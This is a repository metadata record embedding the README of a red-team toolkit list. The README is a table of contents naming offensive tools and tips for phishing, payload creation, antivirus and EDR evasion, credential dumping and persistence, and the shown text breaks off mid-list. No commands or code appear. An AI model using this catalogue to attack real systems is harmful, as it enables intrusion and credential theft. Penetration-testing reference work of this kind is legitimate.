{"id":13510470,"url":"https://github.com/A-poc/RedTeam-Tools","last_synced_at":"2025-03-30T16:33:38.394Z","repository":{"id":61263360,"uuid":"538444958","full_name":"A-poc/RedTeam-Tools","owner":"A-poc","description":"Tools and Techniques for Red Team / Penetration Testing","archived":false,"fork":false,"pushed_at":"2023-08-08T20:30:03.000Z","size":218,"stargazers_count":5958,"open_issues_count":0,"forks_count":814,"subscribers_count":99,"default_branch":"main","last_synced_at":"2024-10-29T15:34:14.538Z","etag":null,"topics":["cheatsheet","cybersecurity","enumeration","hacking","linux","mitre-attack","payload","penetration-testing","pentest","pentest-tools","red-team","red-team-tools","redteam","resources","security-tools","tools","windows"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/A-poc.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2022-09-19T10:20:29.000Z","updated_at":"2024-10-29T10:22:25.000Z","dependencies_parsed_at":"2024-01-29T09:19:18.788Z","dependency_job_id":"98420409-f285-4e27-804a-bdde22e37db5","html_url":"https://github.com/A-poc/RedTeam-Tools","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/A-poc%2FRedTeam-Tools","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/A-poc%2FRedTeam-Tools/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/A-poc%2FRedTeam-Tools/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/A-poc%2FRedTeam-Tools/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/A-poc","download_url":"https://codeload.github.com/A-poc/RedTeam-Tools/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":222566739,"owners_count":17004237,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cheatsheet","cybersecurity","enumeration","hacking","linux","mitre-attack","payload","penetration-testing","pentest","pentest-tools","red-team","red-team-tools","redteam","resources","security-tools","tools","windows"],"created_at":"2024-08-01T02:01:40.394Z","updated_at":"2025-03-30T16:33:38.364Z","avatar_url":"https://github.com/A-poc.png","language":null,"readme":"# RedTeam-Tools\n\n\u003cp align=\"center\"\u003e\n\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210680426-20a92131-56f9-43ad-be82-f449e3215dda.png\" height=\"300\"\u003e\n\u003c/p\u003e\n\nThis github repository contains a collection of **150+** **tools** and **resources** that can be useful for **red teaming activities**. \n\nSome of the tools may be specifically designed for red teaming, while others are more general-purpose and can be adapted for use in a red teaming context.\n\n\u003e πŸ”— If you are a Blue Teamer, check out [BlueTeam-Tools](https://github.com/A-poc/BlueTeam-Tools)\n\n\u003e **Warning** \n\u003e \n\u003e *The materials in this repository are for informational and educational purposes only. They are not intended for use in any illegal activities.*\n\n\u003e **Note** \n\u003e \n\u003e *Hide Tool List headings with the arrow.*\n\u003e \n\u003e *Click πŸ”™ to get back to the list.*\n\n# Tool List\n\n\u003cdetails open\u003e\n \u003csummary\u003e\u003cb\u003eRed Team Tips\u003c/b\u003e 19 tips\u003c/summary\u003e\n \u003cul\u003e\n \u003cul\u003e\n \t\u003cli\u003e\u003cb\u003e\u003ca href=\"#improved-html-smuggling-with-mouse-move-eventlistener\"\u003eImproved HTML smuggling with mouse move eventlistener\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @pr0xylife\u003c/i\u003e\u003c/li\u003e\n \t\u003cli\u003e\u003cb\u003e\u003ca href=\"#google-translate-for-phishing\"\u003eGoogle translate for phishing\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @malmoeb\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#hiding-the-local-admin-account\"\u003eHiding the local admin account\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @Alh4zr3d\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#cripple-windows-defender-by-deleting-signatures\"\u003eCripple windows defender by deleting signatures\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @Alh4zr3d\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#enable-multiple-rdp-sessions-per-user\"\u003eEnable multiple RDP sessions per user\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @Alh4zr3d\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#sysinternals-psexecexe-local-alternative\"\u003eSysinternals PsExec.exe local alternative\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @GuhnooPlusLinux\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#live-off-the-land-port-scanner\"\u003eLive off the land port scanner\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @Alh4zr3d\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#proxy-aware-powershell-downloadstring\"\u003eProxy aware PowerShell DownloadString\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @Alh4zr3d\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#looking-for-internal-endpoints-in-browser-bookmarks\"\u003eLooking for internal endpoints in browser bookmarks\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @Alh4zr3d\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#query-dns-records-for-enumeration\"\u003eQuery DNS records for enumeration\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @Alh4zr3d\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#unquoted-service-paths-without-powerup\"\u003eUnquoted service paths without PowerUp\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @Alh4zr3d\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#bypass-a-disabled-command-prompt-with-k\"\u003eBypass a disabled command prompt with /k\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Martin Sohn Christensen\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#stop-windows-defender-deleting-mimikatzexe\"\u003eStop windows defender deleting mimikatz.exe\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @GuhnooPlusLinux\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#check-if-you-are-in-a-virtual-machine\"\u003eCheck if you are in a virtual machine\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @dmcxblue\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#enumerate-applocker-rules\"\u003eEnumerate AppLocker rules\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @Alh4zr3d\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#cmd-shortcut-with-6-pixels-via-mspaint\"\u003eCMD shortcut with 6 pixels via mspaint\u003c/a\u003e\u003c/b\u003e\u003ci\u003e PenTestPartners\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#link-spoofing-with-preventdefault-javascript-method\"\u003eLink spoofing with PreventDefault JavaScript method\u003c/a\u003e\u003c/b\u003e\u003ci\u003e \u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#check-smb-firewall-rules-with-responder\"\u003eCheck SMB firewall rules with Responder\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @malmoeb\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#disable-av-with-sysinternals-pssuspend\"\u003eDisable AV with SysInternals PsSuspend\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @0gtweet\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e \n\u003c/details\u003e\n\n\u003cdetails open\u003e\n \u003csummary\u003e\u003cb\u003eReconnaissance\u003c/b\u003e 24 tools\u003c/summary\u003e\n \u003cul\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#spiderfoot\"\u003espiderfoot\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Automated OSINT and attack surface mapping\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#reconftw\"\u003ereconftw\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Automated subdomain and vulnerability recon tool\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#subzy\"\u003esubzy\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Subdomain takeover vulnerability checker\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#smtp-user-enum\"\u003esmtp-user-enum\u003c/a\u003e\u003c/b\u003e\u003ci\u003e SMTP user enumeration\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#crtsh---httprobe---eyewitness\"\u003ecrt.sh -\u003e httprobe -\u003e EyeWitness\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Automated domain screenshotting\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#jsendpoints\"\u003ejsendpoints\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Extract page DOM links\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#nuclei\"\u003enuclei\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Vulnerability scanner\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#certsniff\"\u003ecertSniff\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Certificate transparency log keyword sniffer\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#gobuster\"\u003egobuster\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Website path brute force\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#feroxbuster\"\u003eferoxbuster\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Fast content discovery tool written in Rust\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#cloudbrute\"\u003eCloudBrute\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Cloud infrastructure brute force\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#dnsrecon\"\u003ednsrecon\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Enumerate DNS records\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#shodanio\"\u003eShodan.io\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Public facing system knowledge base\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#aort\"\u003eAORT (All in One Recon Tool)\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Subdomain enumeration\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#spoofcheck\"\u003espoofcheck\u003c/a\u003e\u003c/b\u003e\u003ci\u003e SPF/DMARC record checker\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#awsbucketdump\"\u003eAWSBucketDump\u003c/a\u003e\u003c/b\u003e\u003ci\u003e S3 bucket enumeration\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#githarvester\"\u003eGitHarvester\u003c/a\u003e\u003c/b\u003e\u003ci\u003e GitHub credential searcher\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#trufflehog\"\u003etruffleHog\u003c/a\u003e\u003c/b\u003e\u003ci\u003e GitHub credential scanner\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#dismap\"\u003eDismap\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Asset discovery/identification\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#enum4linux\"\u003eenum4linux\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows/samba enumeration\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#skanuvaty\"\u003eskanuvaty\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Dangerously fast dns/network/port scanner\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#metabigor\"\u003eMetabigor\u003c/a\u003e\u003c/b\u003e\u003ci\u003e OSINT tool without API\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#gitrob\"\u003eGitrob\u003c/a\u003e\u003c/b\u003e\u003ci\u003e GitHub sensitive information scanner\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#gowitness\"\u003egowitness\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Web screenshot utility using Chrome Headless\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\n\u003cdetails open\u003e\n \u003csummary\u003e\u003cb\u003eResource Development\u003c/b\u003e 12 tools\u003c/summary\u003e\n \u003cul\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#remoteinjector\"\u003eremoteinjector\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Inject remote template link into word document\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#chimera\"\u003eChimera\u003c/a\u003e\u003c/b\u003e\u003ci\u003e PowerShell obfuscation\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#msfvenom\"\u003emsfvenom\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Payload creation\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#shellter\"\u003eShellter\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Dynamic shellcode injection tool\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#freeze\"\u003eFreeze\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Payload creation (circumventing EDR)\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#wordsteal\"\u003eWordSteal\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Steal NTML hashes with Microsoft Word\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#ntapi-undocumented-functions\"\u003eNTAPI Undocumented Functions\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows NT Kernel, Native API and drivers\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#kernel-callback-functions\"\u003eKernel Callback Functions\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Undocumented Windows APIs\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#offensivevba\"\u003eOffensiveVBA\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Office macro code execution and evasion techniques\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#wsh\"\u003eWSH\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Wsh payload\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#hta\"\u003eHTA\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Hta payload\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#vba\"\u003eVBA\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Vba payload\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\n\u003cdetails open\u003e\n \u003csummary\u003e\u003cb\u003eInitial Access\u003c/b\u003e 10 tools\u003c/summary\u003e\n \u003cul\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#credmaster\"\u003eCredMaster\u003c/a\u003e\u003c/b\u003e\u003ci\u003e CredKing password spraying tool\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#trevorspray\"\u003eTREVORspray\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Password sprayer with threading\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#evilqr\"\u003eevilqr\u003c/a\u003e\u003c/b\u003e\u003ci\u003e QRLJacking phishing PoC\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#cupp\"\u003eCUPP\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Common User Passwords Profiler (CUPP)\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#bash-bunny\"\u003eBash Bunny\u003c/a\u003e\u003c/b\u003e\u003ci\u003e USB attack tool\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#evilgophish\"\u003eEvilGoPhish\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Phishing campaign framework\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#social-engineer-toolkit-set\"\u003eThe Social-Engineer Toolkit\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Phishing campaign framework\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#hydra\"\u003eHydra\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Brute force tool\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#squarephish\"\u003eSquarePhish\u003c/a\u003e\u003c/b\u003e\u003ci\u003e OAuth/QR code phishing framework\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#king-phisher\"\u003eKing Phisher\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Phishing campaign framework\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\n\u003cdetails open\u003e\n \u003csummary\u003e\u003cb\u003eExecution\u003c/b\u003e 13 tools\u003c/summary\u003e\n \u003cul\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#responder\"\u003eResponder\u003c/a\u003e\u003c/b\u003e\u003ci\u003e LLMNR, NBT-NS and MDNS poisoner\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#secretsdump\"\u003esecretsdump\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Remote hash dumper\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#evil-winrm\"\u003eevil-winrm\u003c/a\u003e\u003c/b\u003e\u003ci\u003e WinRM shell\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#donut\"\u003eDonut\u003c/a\u003e\u003c/b\u003e\u003ci\u003e In-memory .NET execution\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#macro_pack\"\u003eMacro_pack\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Macro obfuscation\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#powersploit\"\u003ePowerSploit\u003c/a\u003e\u003c/b\u003e\u003ci\u003e PowerShell script suite\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#rubeus\"\u003eRubeus\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Active directory hack tool\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#sharpup\"\u003eSharpUp\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows vulnerability identifier\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#sqlrecon\"\u003eSQLRecon\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Offensive MS-SQL toolkit\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#ultimateapplockerbypasslist\"\u003eUltimateAppLockerByPassList\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Common AppLocker Bypass Techniques\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#starfighters\"\u003eStarFighters\u003c/a\u003e\u003c/b\u003e\u003ci\u003e JavaScript and VBScript Based Empire Launcher\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#demiguise\"\u003edemiguise\u003c/a\u003e\u003c/b\u003e\u003ci\u003e HTA encryption tool\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#powerzure\"\u003ePowerZure\u003c/a\u003e\u003c/b\u003e\u003ci\u003e PowerShell framework to assess Azure security\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\n\u003cdetails open\u003e\n \u003csummary\u003e\u003cb\u003ePersistence\u003c/b\u003e 4 tools\u003c/summary\u003e\n \u003cul\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#impacket\"\u003eImpacket\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Python script suite\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#empire\"\u003eEmpire\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Post-exploitation framework\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#sharpersist\"\u003eSharPersist\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows persistence toolkit\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#ligolo-ng\"\u003eligolo-ng\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Tunneling tool that uses a TUN interface\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\n\u003cdetails open\u003e\n \u003csummary\u003e\u003cb\u003ePrivilege Escalation\u003c/b\u003e 11 tools\u003c/summary\u003e\n \u003cul\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#crassus\"\u003eCrassus\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows privilege escalation discovery tool\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#linpeas\"\u003eLinPEAS\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Linux privilege escalation\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#winpeas\"\u003eWinPEAS\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows privilege escalation\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#linux-smart-enumeration\"\u003elinux-smart-enumeration\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Linux privilege escalation\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#certify\"\u003eCertify\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Active directory privilege escalation\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#get-gpppassword\"\u003eGet-GPPPassword\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows password extraction\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#sherlock\"\u003eSherlock\u003c/a\u003e\u003c/b\u003e\u003ci\u003e PowerShell privilege escalation tool\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#watson\"\u003eWatson\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows privilege escalation tool\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#impulsivedllhijack\"\u003eImpulsiveDLLHijack\u003c/a\u003e\u003c/b\u003e\u003ci\u003e DLL Hijack tool\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#adfsdump\"\u003eADFSDump\u003c/a\u003e\u003c/b\u003e\u003ci\u003e AD FS dump tool\u003c/i\u003e\u003c/li\u003e \n \u003cli\u003e\u003cb\u003e\u003ca href=\"#beroot\"\u003eBeRoot\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Multi OS Privilege Escalation Project\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\n\u003cdetails open\u003e\n \u003csummary\u003e\u003cb\u003eDefense Evasion\u003c/b\u003e 8 tools\u003c/summary\u003e\n \u003cul\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#invoke-obfuscation\"\u003eInvoke-Obfuscation\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Script obfuscator\u003c/i\u003e\u003c/li\u003e\n\t \u003cli\u003e\u003cb\u003e\u003ca href=\"#veil\"\u003eVeil\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Metasploit payload obfuscator\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#sharpblock\"\u003eSharpBlock\u003c/a\u003e\u003c/b\u003e\u003ci\u003e EDR bypass via entry point execution prevention\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#alcatraz\"\u003eAlcatraz\u003c/a\u003e\u003c/b\u003e\u003ci\u003e GUI x64 binary obfuscator\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#mangle\"\u003eMangle\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Compiled executable manipulation\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#amsi-fail\"\u003eAMSI Fail\u003c/a\u003e\u003c/b\u003e\u003ci\u003e PowerShell snippets that break or disable AMSI\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#scarecrow\"\u003eScareCrow\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Payload creation framework designed around EDR bypass\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#moonwalk\"\u003emoonwalk\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Linux system log and filesystem timestamp remover\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\n\u003cdetails open\u003e\n \u003csummary\u003e\u003cb\u003eCredential Access\u003c/b\u003e 11 tools\u003c/summary\u003e\n \u003cul\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#mimikatz\"\u003eMimikatz\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows credential extractor\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#lazagne\"\u003eLaZagne\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Local password extractor\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#hashcat\"\u003ehashcat\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Password hash cracking\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#john-the-ripper\"\u003eJohn the Ripper\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Password hash cracking\u003c/i\u003e\u003c/li\u003e\n\t \u003cli\u003e\u003cb\u003e\u003ca href=\"#scomdecrypt\"\u003eSCOMDecrypt\u003c/a\u003e\u003c/b\u003e\u003ci\u003e SCOM Credential Decryption Tool\u003c/i\u003e\u003c/li\u003e\n\t \u003cli\u003e\u003cb\u003e\u003ca href=\"#nanodump\"\u003enanodump\u003c/a\u003e\u003c/b\u003e\u003ci\u003e LSASS process minidump creation\u003c/i\u003e\u003c/li\u003e\n\t \u003cli\u003e\u003cb\u003e\u003ca href=\"#eviltree\"\u003eeviltree\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Tree remake for credential discovery\u003c/i\u003e\u003c/li\u003e\n\t \u003cli\u003e\u003cb\u003e\u003ca href=\"#seeyoucm-thief\"\u003eSeeYouCM-Thief\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Cisco phone systems configuration file 